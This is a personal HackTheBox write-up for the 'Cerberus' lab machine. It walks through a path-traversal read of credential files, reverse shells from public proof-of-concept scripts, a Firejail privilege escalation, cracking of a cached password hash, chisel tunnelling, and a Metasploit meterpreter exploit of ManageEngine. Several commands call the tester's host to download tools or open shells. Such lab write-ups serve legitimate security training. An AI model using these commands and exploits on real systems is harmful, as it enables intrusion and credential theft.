HackMDHTB - Cerberus
Initial nmap results show a single port open:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ nmap -sC -sV -p- --min-rate 1000 -oN nmap/cerberus -Pn $target_ip
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 07:09 EDT
Nmap scan report for cerberus.local ($target_ip)
Host is up (0.036s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Did not follow redirect to http://icinga.cerberus.local:8080/icingaweb2
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 143.23 seconds
This (thanks to the redirect notice) at least enumerated the domain (cerberus.htb) and the running service, Icinga, on a eponymous subdomain - added domain and subdomain to /etc/hosts:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ sudo vi /etc/hosts
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
# HTB
$target_ip cerberus.local icinga.cerberus.local
Browsing to http://icinga.cerberus.local:8080/icingaweb2 redirects to a login panel: http://icinga.cerberus.local:8080/icingaweb2/authentication/login
Tried default credentials of icingaadmin:icinga found with Google but no luck.
Tried catching the initial request in Burp to try enumerate version as nothing obvious in the page source; searchsploit had nothing at all for icinga2 though.
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ searchsploit icingaweb2
Exploits: No Results
Shellcodes: No Results
Threw gobuster at it while searching Google for CVE's though nothing noteworthy came back (except perhaps that it kept failing to finish the wordlist at around 99% for some reason…)
This article from PortSwigger stood out so had a peak, CVE-2022-24716 (Aritrary File Read) could be patched in the running version, but, as I don't know what version that is yet I looked for a proof of concept anyway.
Found this python PoC script but reading through it I decided to just pull out the payload string and try it quickly with cURL for now:
<SNIP>
exploit_url=url+"/lib/icinga/icinga-php-thirdparty"+path
<SNIP>
First attempt was (confusingly) successful as I tried /etc/passwd out of habit and this is supposed to be a Windows box…(WSL or container)?
I'd completely blanked that it was picking the box up as Ubuntu when first going over the nmap scan… 🤦♂️
8080/tcp open http Apache httpd 2.4.52 ((Ubuntu))
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
matthew:x:1000:1000:matthew:/home/matthew:/bin/bash
ntp:x:108:113::/nonexistent:/usr/sbin/nologin
sssd:x:109:115:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
nagios:x:110:118::/var/lib/nagios:/usr/sbin/nologin
redis:x:111:119::/var/lib/redis:/usr/sbin/nologin
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
icingadb:x:999:999::/etc/icingadb:/sbin/nologin
Checked out the Icinga2 Documentation to see what useful files I might be able to grab with this vuln.
'config.ini' and 'resources.ini' certainly seem like they'd be worth a look:
config.ini General configuration (global, logging, themes, etc.)
resources.ini Global resources (Icinga Web 2 database for preferences and authentication, Icinga 2 IDO database)
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/config.ini
[global]
show_stacktraces = "1"
show_application_state_messages = "1"
config_backend = "db"
config_resource = "icingaweb2"
module_path = "/usr/share/icingaweb2/modules/"
[logging]
log = "syslog"
level = "ERROR"
application = "icingaweb2"
facility = "user"
[themes]
[authentication]
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/resources.ini
[icingaweb2]
type = "db"
db = "mysql"
host = "localhost"
dbname = "icingaweb2"
username = "matthew" <--- Nice
password = "IcingaWebPassword2023" <--- Nicer
use_ssl = "0"
echo 'matthew:IcingaWebPassword2023' >> loot/creds.txt
Going back to the browser I can login to the admin panel:
Also now know the exact service version:
Vulnerable to CVE-2022-24715 (Authenticated Remote Code Execution) next, with another proof of concept script here
Tried messing around with it manually via Burp and the web app for a while by adding a user and an ssh key according to this…
…but it was giving me too much lip, first issues with the key format (not using a passphrase when generating it seemed to be the resolution here, but NFI why - encoding issue, I think).
After getting over that hurdle I just couldn't seem to execute any PHP code with it - again, would assume encoding issue.
Knowing there was likely a much easier route, I went for the above PoC script…don't really understand why this was any better than the manual method because it seemed to be doing the exact same thing:
:man-shrugging:
Needed an SSH key in PEM format either way, so:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools]
└─$ ssh-keygen -t rsa -m PEM -f key
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in key
Your public key has been saved in key.pub
The key fingerprint is:
SHA256:oSBt+tCEuHfEfDQ/+t/v7k0PIa886eoIgZ3IEWKMw+I kali@kali
The key's randomart image is:
+---[RSA 3072]----+
|.oo . o |
|++.* o o |
|+.o X . + |
| E O B + o |
|. + * * S . . |
| . + o o . |
| . . . .o .|
| . o oo. +.|
| ..+o=*= o|
+----[SHA256]-----+
Fired up netcat on 9001 to catch my shell…
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
…and executed the CVE-2022-24715 PoC script in another terminal:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools]
└─$ python3 exploit.py -t http://icinga.cerberus.local:8080/icingaweb2/ -I 10.10.14.76 -P 9001 -u matthew -p IcingaWebPassword2023 -e key
[INFO] Attempting to login to the Icinga Web 2 instance...
[INFO] Attempting to upload our malicious module...
[SUCCESS] The payload appears to be uploaded successfully!
[INFO] Modifying configurations...
[INFO] Attempting to enable the malicious module...
[INFO] Trying to trigger payload! Have a listener ready!
[SUCCESS] It appears that a reverse shell was started!
[INFO] Removing malicious module file...
[INFO] Disabling malicious module...
[INFO] Resetting website configuration...
[SUCCESS] Cleanup successful! Shutting down...
[ALERT] In the process of exploitation, the application logging has been turned off. Log in manually to reset these settings!
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools]
└─$
Had Python3 available on the box, so did the usual trick to get fully interactive TTY:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.76] from (UNKNOWN) [$target_ip] 49874
bash: cannot set terminal process group (630): Inappropriate ioctl for device
bash: no job control in this shell
www-data@icinga:/usr/share/icingaweb2/public$ which python
which python
www-data@icinga:/usr/share/icingaweb2/public$ which python3
which python3
/usr/bin/python3
www-data@icinga:/usr/share/icingaweb2/public$ python3 -c "import pty;pty.spawn('/bin/bash')"
<lic$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@icinga:/usr/share/icingaweb2/public$ ^Z
zsh: suspended nc -lvnp 9001
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ stty raw -echo && fg
[1] + continued nc -lvnp 9001
www-data@icinga:/usr/share/icingaweb2/public$ export TERM=tmux-256color
Stood up a local web server to get LinPEAS onto the machine to look for PrivEsc vectors:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools]
└─$ sudo python3 -m http.server 80
[sudo] password for kali:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
$target_ip - - [30/Apr/2023 15:09:21] "GET /linpeas.sh HTTP/1.1" 200 -
LinPeas doesn't think we're in a container…interesting.
-rwsr-xr-x 1 root root 464K Jan 19 2022 /usr/bin/firejail (Unknown SUID binary!) <---- This is worth a look though...
Googled for 'firejail' and there's yet another CVE with a PoC script that can be leveraged to get root on the Linux container(which I assume is just this FireJail now)
Read through the explanation of CVE-2022-31214 'FireJoin' here and made use of this proof of concept script linked at the end of the article (needed to change the extension to .py).
www-data@icinga:/dev/shm$ curl http://10.10.14.76/firejoin.py -o firejoin.py
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 8651 100 8651 0 0 138k 0 --:--:-- --:--:-- --:--:-- 140k
www-data@icinga:/dev/shm$ ls
firejoin.py linpeas.sh
www-data@icinga:/dev/shm$ file firejoin.py
firejoin.py: Python script, ASCII text executable
www-data@icinga:/dev/shm$ python3 firejoin.py
/dev/shm/firejoin.py needs to have the execute bit set for the exploit to work. Run `chmod +x /dev/shm/firejoin.py` and try again.
www-data@icinga:/dev/shm$ chmod +x firejoin.py && python3 firejoin.py
You can now run 'firejail --join=19941' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.
Fired up another reverse shell with the same method as before on another port:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ nc -lvnp 9002
listening on [any] 9002 ...
connect to [10.10.14.76] from (UNKNOWN) [10.129.194.21] 49870
bash: cannot set terminal process group (622): Inappropriate ioctl for device
bash: no job control in this shell
www-data@icinga:/usr/share/icingaweb2/public$ python3 -c "import pty;pty.spawn('/bin/bash')"
<lic$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@icinga:/usr/share/icingaweb2/public$ ^Z
zsh: suspended nc -lvnp 9002
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ stty raw -echo && fg
[1] + continued nc -lvnp 9002
www-data@icinga:/usr/share/icingaweb2/public$ export TERM=tmux-256color
www-data@icinga:/usr/share/icingaweb2/public$ firejail --join=19941
changing root to /proc/19941/root
Warning: cleaning all supplementary groups
Child process initialized in 13.65 ms
www-data@icinga:/usr/share/icingaweb2/public$ su -
root@icinga:~#
Got root - still no flags though, so nowhere near done…after some flapping about in the wind, checked out /etc/hosts…
root@icinga:~# cat /etc/hosts
127.0.0.1 iceinga.cerberus.local iceinga
127.0.1.1 localhost
172.16.22.1 DC.cerberus.local DC cerberus.local ...revealing this.
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
root@icinga:~#
Looking through LinPEAS output again… I'd re-ran it as root just in case, not sure if it made a diference, or if I'd just not picked up on it the first time (note to self: learn to save output) but this eventually stood out, being domain related n'all…
[sssd]
domains = cerberus.local
config_file_version = 2
services = nss, pam
[domain/cerberus.local]
default_shell = /bin/bash
ad_server = cerberus.local
krb5_store_password_if_offline = True
cache_credentials = True
krb5_realm = CERBERUS.LOCAL
realmd_tags = manages-system joined-with-adcli
id_provider = ad
fallback_homedir = /home/%u@%d
ad_domain = cerberus.local
use_fully_qualified_names = True
ldap_id_mapping = True
access_provider = ad
-rw-r--r-- 1 root root 169 Oct 4 2022 /usr/lib/x86_64-linux-gnu/sssd/conf/sssd.conf
[sssd]
domains = shadowutils
Almost certaintly what we want to target to get onto the Windows machine (172.16.22.1), and some Google only added confirmation: SSSD Documentation
cache_credentials = True <--- Sounds particularly juicy...wonder where the cache is...
Eventually found it with some
find / | grep -i sss
root@icinga:/var/lib/sss/db# ls
cache_cerberus.local.ldb config.ldb timestamps_cerberus.local.ldb
ccache_CERBERUS.LOCAL sssd.ldb
root@icinga:/var/lib/sss/db#
Binary format but can 'strings' it well enough..
root@icinga:/var/lib/sss/db# file cache_cerberus.local.ldb
cache_cerberus.local.ldb: TDB database version 6, little-endian hash size 10000 bytes
root@icinga:/var/lib/sss/db# strings cache_cerberus.local.ldb
<SNIP>
cachedPassword
$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0
cachedPasswordType
<SNIP>
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ echo '$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0' >> hash
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
147258369 (?)
1g 0:00:00:00 DONE (2023-04-30 13:06) 2.500g/s 1280p/s 1280c/s 1280C/s jeffrey..letmein
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$
Nice..
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ echo "matthew:147258369" >> loot/creds.txt
Need to look for something running on the DC that we can pivot to…try dropping a compiled nmap for win32 to the box:
root@icinga:/dev/shm# wget http://10.10.14.76/nmap-x64.tar.gz
--2023-04-30 21:30:13-- http://10.10.14.76/nmap-x64.tar.gz
Connecting to 10.10.14.76:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10686789 (10M) [application/gzip]
Saving to: 'nmap-x64.tar.gz'
nmap-x64.tar.gz 100%[===================>] 10.19M 463KB/s in 30s
2023-04-30 21:30:43 (350 KB/s) - 'nmap-x64.tar.gz' saved [10686789/10686789]
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
MAC Address: 00:15:5D:5F:E8:00 (Microsoft)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
WinRM… but first we'll need to tunnel with chisel
Attacking machine is the server in reverse mode:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools]
└─$ chisel server -p 8888 --reverse
And on the Linux box:
./chisel client --max-retry-count=1 10.10.14.76:8888 R:5985:172.16.22.1:5985
You can search for 'chisel' on ippsec.rocks for good explanations of all this tunnelling business (awesome resource in general anytime you're stuck but have some keywords you can throw at it).
2023/04/30 17:57:32 server: Reverse tunnelling enabled
2023/04/30 17:57:32 server: Fingerprint 7oPtF2heLbHEu0624ToKDh1dQ/bUjiTB03h+EDZHmds=
2023/04/30 17:57:32 server: Listening on http://0.0.0.0:8888
2023/04/30 17:57:36 server: session#1: tun: proxy#R:5985=>172.16.22.1:5985: Listening
Then in a another terminal on attacking box:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ evil-winrm -i 127.0.0.1 -u matthew -p 147258369
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\matthew\Documents> whoami
cerberus\matthew
*Evil-WinRM* PS C:\Users\matthew\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\matthew\Desktop> ls
Directory: C:\Users\matthew\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/30/2023 12:29 PM 34 user.txt
*Evil-WinRM* PS C:\Users\matthew\Desktop> type user.txt
f2f8d9bec0fd854c4fee75e0a37594df
*Evil-WinRM* PS C:\Users\matthew\Desktop>
Finally have User… 😌
Grabbed WinPEAS to look for PrivEsc vector from here and uploaded to the box through Evil-WinRM:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools]
└─$ evil-winrm -i 127.0.0.1 -u matthew -p 147258369
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\matthew\Documents> upload winPEASany.exe
Info: Uploading /home/kali/HackTheBox/Machines/Cerberus/tools/winPEASany.exe to C:\Users\matthew\Documents\winPEASany.exe
Data: 2703360 bytes of 2703360 bytes copied
Info: Upload successful!
Spent a while gawping at WinPEAS output, with nothing really jumping out at me initially but there is "ManageEngine" which is non-standard, and on inspection seemed AD related so Googled it and found that there's yet another public vulnerability: CVE_2022_479661
*Evil-WinRM* PS C:\Users\matthew\Documents> cd "C:/Program Files (x86)"
*Evil-WinRM* PS C:\Program Files (x86)> ls
Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/15/2018 12:28 AM Common Files
d----- 5/1/2023 4:08 AM Google
d----- 9/7/2022 4:34 AM Internet Explorer
d----- 1/29/2023 11:12 AM ManageEngine <---
d----- 9/15/2018 12:19 AM Microsoft.NET
d----- 8/24/2021 7:47 AM Windows Defender
d----- 8/24/2021 7:47 AM Windows Mail
d----- 9/7/2022 4:34 AM Windows Media Player
d----- 9/15/2018 12:19 AM Windows Multimedia Platform
d----- 9/15/2018 12:28 AM windows nt
d----- 8/24/2021 7:47 AM Windows Photo Viewer
d----- 9/15/2018 12:19 AM Windows Portable Devices
d----- 9/15/2018 12:19 AM WindowsPowerShell
It's only listening locally on the Windows box though…which means another pivot 😱
*Evil-WinRM* PS C:\Users\matthew\Documents> netstat -anop TCP
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING 700
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 952
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING 700
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:464 0.0.0.0:0 LISTENING 700
TCP 0.0.0.0:593 0.0.0.0:0 LISTENING 952
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING 700
TCP 0.0.0.0:808 0.0.0.0:0 LISTENING 5552
TCP 0.0.0.0:1500 0.0.0.0:0 LISTENING 5552
TCP 0.0.0.0:1501 0.0.0.0:0 LISTENING 5552
TCP 0.0.0.0:2179 0.0.0.0:0 LISTENING 3424
TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING 700
TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING 700
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8888 0.0.0.0:0 LISTENING 5756
TCP 0.0.0.0:9251 0.0.0.0:0 LISTENING 5756 <--- ManageEngine listening locally on 9251
TCP 0.0.0.0:9389 0.0.0.0:0 LISTENING 2016
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49459 0.0.0.0:0 LISTENING 3136
Listening port was found here after some searching.
Get another chisel server going on attack box:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus/tools]
└─$ chisel server -p 9999 --reverse
2023/05/01 08:45:17 server: Reverse tunnelling enabled
2023/05/01 08:45:17 server: Fingerprint /ouUxxvtKDEl+5tBsDCw23XZj9LHxliOGD6mTJsFzuQ=
2023/05/01 08:45:17 server: Listening on http://0.0.0.0:9999
2023/05/01 08:50:25 server: session#1: tun: proxy#R:9251=>172.16.22.1:9251: Listening
Get .exe version of chisel and upload to the Windows box - could just have used Evil-WinRM's built in 'upload' now, but I forgot it was a thing and went with curl:
*Evil-WinRM* PS C:\Users\matthew\Documents> curl 10.10.14.76/chisel.exe -o chisel.exe
*Evil-WinRM* PS C:\Users\matthew\Documents> ./chisel.exe client --max-retry-count=1 10.10.14.76:9999 R:9251:172.16.22.1:9251
This did…something, as I could hit the page in Firefox now…
…but after a bit of loading resources it tries to redirect to dc.cerberus.local (taking its time about it) with some params that made me think it had worked at first, but then it failed to display the page:
Or maybe it should be:
./chisel.exe client --max-retry-count=1 10.10.14.76:9999 R:1080:socks
Still couldn't hit it…edited /etc/hosts to point everything at localhost:
#10.129.229.4 cerberus.local incinga.cerberus.local
127.0.0.1 cerberus.local icinga.cerberus.local dc.cerberus.local
Still couldn't hit it but then it occured to add the SOCKS proxy in Firefox 🤦♂️
Then navigating to https://dc.cerberus.local:9251 and I'm finally in…
Logged in with matthew@cerberus.local:147258369:
Not much to see on the page but important GUID in the URL that became important for the next exploit:
67a8d101690402dc6a6744b8fc8a7ca1acf88b2f
Fired up MetaSploit for this last step:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ msfconsole
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v6.3.13-dev ]
+ -- --=[ 2311 exploits - 1205 auxiliary - 412 post ]
+ -- --=[ 975 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: View advanced module options with
advanced
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search manageengine
Realised this point (read: after a lot more failing) that I had to set the SOCKS proxy for MSF to see the service so backed out and edited proxychains4.conf:
```bash
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
socks5 127.0.0.1 1080
Then:
┌──(kali㉿kali)-[~/HackTheBox/Machines/Cerberus]
└─$ sudo proxychains4 -q bash
[sudo] password for kali:
┌──(root㉿kali)-[/home/kali/HackTheBox/Machines/Cerberus]
└─# msfconsole
___ ____
,-"" `. < HONK >
,' _ e )`-._ / ----
/ ,' `-._<.===-'
/ /
/ ;
_ / ;
(`._ _.-"" ""--..__,' |
<_ `-"" \
<`- :
(__ <__. ;
`-. '-.__. _.' /
\ `-.__,-' _,'
`._ , /__,-'
""._\__,'< <____
| | `----.`.
| | \ `.
; |___ \-``
\ --<
`.`.<
`-'
=[ metasploit v6.3.13-dev ]
+ -- --=[ 2311 exploits - 1205 auxiliary - 412 post ]
+ -- --=[ 975 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Metasploit can be configured at startup, see
msfconsole --help to learn more
Metasploit Documentation: https://docs.metasploit.com/
msf6 >
msf6 > use exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966
[*] Using configured payload cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > options
<SNIP>
Module options (exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966):
---- --------------- -------- -----------
GUID 67a8d101690402dc6a6744b8fc8a7ca1acf88b2f yes The SAML endpoint GUID
ISSUER_URL http://dc.cerberus.local/adfs/services/trust yes The Issuer URL used by the Identity Provider which has been configured as the SAML authentication provider for the target server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RELAY_STATE no The Relay State. Default is "http(s)://<rhost>:<rport>/samlLogin/LoginAuth"
RHOSTS 172.16.22.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 9251 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /samlLogin yes The SAML endpoint URL
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (cmd/windows/powershell/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.76 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Windows Command
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > exploit
[*] Started reverse TCP handler on 10.10.14.76:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (175686 bytes) to 10.129.229.4
[*] Meterpreter session 2 opened (10.10.14.76:4444 -> 10.129.229.4:51935) at 2023-05-01 11:52:38 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM <---- :)
meterpreter > pwd
C:\Program Files (x86)\ManageEngine\ADSelfService Plus\bin
meterpreter > cd C:/Users/Administrator/Desktop
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2023-03-06 10:00:00 -0500 desktop.ini
100444/r--r--r-- 34 fil 2023-05-01 06:50:45 -0400 root.txt
meterpreter > cat root.txt
9473401241e600a4295dda7301d245a9
meterpreter >
Note: tried calling MSF's "shell" here to get proper system shell but for some reason it was just hanging indefinitely - couldn't find a quick answer other than updating the MSF version so, meh.
Overall, a really fun box and a great opporunity to practice pivoting while keeping the exploits themselves easy enough to work with - can't speak from experience but tempted to call this one "real-world" rather than "CTF-like".
It wouldn't suprise me if this one ends up on the TJ Null List (though it would also scare me a little given how long it took me to get through it…don't fancy knocking five of these out inside of 24-hours for the OSCP 😱…getting better though…slowly.)
